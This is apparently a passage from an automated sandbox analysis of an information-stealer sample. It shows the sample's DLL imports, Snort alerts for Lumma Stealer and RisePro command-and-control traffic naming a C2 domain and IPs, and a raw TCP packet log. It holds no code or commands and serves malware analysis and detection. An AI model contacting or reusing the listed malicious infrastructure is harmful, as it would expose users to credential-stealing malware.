                                                                                                                                            DLLImport
                                                                                                                                            kernel32.dllGetModuleHandleA
                                                                                                                                            USER32.dllwsprintfA
                                                                                                                                            GDI32.dllCreateCompatibleBitmap
                                                                                                                                            ADVAPI32.dllRegQueryValueExA
                                                                                                                                            SHELL32.dllShellExecuteA
                                                                                                                                            ole32.dllCoInitialize
                                                                                                                                            WS2_32.dllWSAStartup
                                                                                                                                            CRYPT32.dllCryptUnprotectData
                                                                                                                                            SHLWAPI.dllPathFindExtensionA
                                                                                                                                            gdiplus.dllGdipGetImageEncoders
                                                                                                                                            SETUPAPI.dllSetupDiEnumDeviceInfo
                                                                                                                                            ntdll.dllRtlUnicodeStringToAnsiString
                                                                                                                                            RstrtMgr.DLLRmStartSession

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States
                                                                                                                                            KoreanNorth Korea
                                                                                                                                            KoreanSouth Korea

                                                                                                                                            Network Behavior

                                                                                                                                            Snort IDS Alerts

                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            04/21/24-15:31:20.586831UDP2052033ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (bordersoarmanusjuw .shop)5209353192.168.2.41.1.1.1
                                                                                                                                            04/21/24-15:31:25.628405TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49760443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:23.881087TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49754443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:33.821783TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49767443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:26.418186TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49762443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:21.334851TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49743443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:22.307200TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49748443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:41.967279TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49775443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:36.937476TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49771443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:35.293170TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49769443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:24.663338TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49756443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:27.426056TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49764443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:23.027299TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49750443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:23.083597TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49751443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:25.393562TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49758443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:21.497185TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49745443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:43.541138TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49777443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:03.459237TCP2046269ET TROJAN [ANY.RUN] RisePro TCP (Activity)4973250500192.168.2.4193.233.132.253
                                                                                                                                            04/21/24-15:31:23.803046TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49753443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:22.231263TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49747443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:26.161697TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49761443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:45.038330TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49779443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:45.673426TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49780443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:33.057817TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49766443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:24.609439TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49755443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:41.199553TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49774443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:34.487931TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49768443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:37.580199TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49772443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:20.726146TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49742443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:24.761343TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49757443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:21.449796TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49744443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:26.584600TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49763443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:36.076592TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49770443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:42.756248TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49776443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:00.128706TCP2049060ET TROJAN RisePro TCP Heartbeat Packet4973250500192.168.2.4193.233.132.253
                                                                                                                                            04/21/24-15:31:22.967985TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49749443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:25.400720TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49759443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:44.323393TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49778443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:27.781654TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49765443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:23.794727TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49752443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:46.836355TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49781443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:00.343729TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5050049732193.233.132.253192.168.2.4
                                                                                                                                            04/21/24-15:31:11.754990TCP2046267ET TROJAN [ANY.RUN] RisePro TCP (External IP)5050049732193.233.132.253192.168.2.4
                                                                                                                                            04/21/24-15:31:22.151633TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49746443192.168.2.4172.67.189.66
                                                                                                                                            04/21/24-15:31:38.597070TCP2052042ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI)49773443192.168.2.4172.67.189.66

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Apr 21, 2024 15:30:59.860203981 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:00.101953983 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:00.102061033 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:00.128705978 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:00.343729019 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:00.396625996 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:00.424932003 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:03.459237099 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:03.753407001 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:11.754990101 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:11.803339005 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:12.045018911 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.088685989 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.088768959 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.088860035 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.091751099 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.091787100 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.099632978 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:12.318171978 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.318367958 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.320291996 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.320322037 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.320843935 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.344369888 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.344516993 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:12.361529112 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.408123016 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.554577112 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.554698944 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.554869890 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.596008062 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.596008062 CEST49733443192.168.2.434.117.186.192
                                                                                                                                            Apr 21, 2024 15:31:12.596076012 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.596158028 CEST4434973334.117.186.192192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.637617111 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.711200953 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:12.711251974 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.711321115 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:12.711627007 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:12.711667061 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.934827089 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.934962988 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:12.937274933 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:12.937304974 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.937661886 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.938883066 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:12.984142065 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:13.355549097 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:13.355645895 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:13.355828047 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:13.355917931 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:13.355917931 CEST49734443192.168.2.4104.26.5.15
                                                                                                                                            Apr 21, 2024 15:31:13.355962038 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:13.355993032 CEST44349734104.26.5.15192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:13.361119032 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:13.648124933 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:14.529617071 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:14.559459925 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:14.855963945 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:14.920520067 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:14.961065054 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:15.253354073 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:15.291058064 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:15.334042072 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:15.396770954 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:15.670027018 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:15.724750996 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:15.724848032 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:16.019438982 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:16.082125902 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:16.130882025 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:17.883500099 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:17.888242006 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.129798889 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.130057096 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.195894957 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.371427059 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371480942 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371505976 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.371515989 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371556997 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.371576071 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.371661901 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371695995 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371706009 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371717930 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371728897 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.371746063 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.371778965 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.371803999 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.443550110 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.443706036 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.443950891 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.612561941 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.612624884 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.612682104 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.612693071 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.612771034 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.612869978 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.612881899 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.612935066 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.612940073 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.612945080 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.613060951 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.613071918 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.613143921 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.613219023 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.613360882 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.613425970 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.613435984 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.613445044 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.613508940 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.613545895 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.613584995 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.696966887 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.697093010 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.698138952 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.853627920 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.853744030 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.853844881 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.853854895 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.853863955 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.853905916 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.853908062 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.853949070 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.853962898 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.853971958 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854022026 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854130030 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854180098 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854186058 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854190111 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854203939 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854232073 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854244947 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854260921 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854322910 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854373932 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854424000 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854456902 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854466915 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854475021 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854516029 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854532957 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854649067 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854657888 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854688883 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854696035 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854707956 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854732037 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854743958 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854753971 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854801893 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854929924 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854938984 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854983091 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.854985952 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.854999065 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855009079 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855017900 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855055094 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.855057001 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855067968 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855079889 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.855115891 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.855168104 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.947947979 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948024035 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948599100 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948612928 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948648930 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948683977 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948717117 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948729992 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948740005 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948750973 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948760986 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948767900 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948770046 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948781013 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948790073 CEST8049740193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:18.948812008 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948812008 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:18.948846102 CEST4974080192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095181942 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095236063 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095263958 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095271111 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095304966 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095309973 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095341921 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095365047 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095379114 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095408916 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095416069 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095434904 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095470905 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095520020 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095561981 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095572948 CEST4973250500192.168.2.4193.233.132.253
                                                                                                                                            Apr 21, 2024 15:31:19.095582962 CEST5050049732193.233.132.253192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:19.095602036 CEST5050049732193.233.132.253192.168.2.4
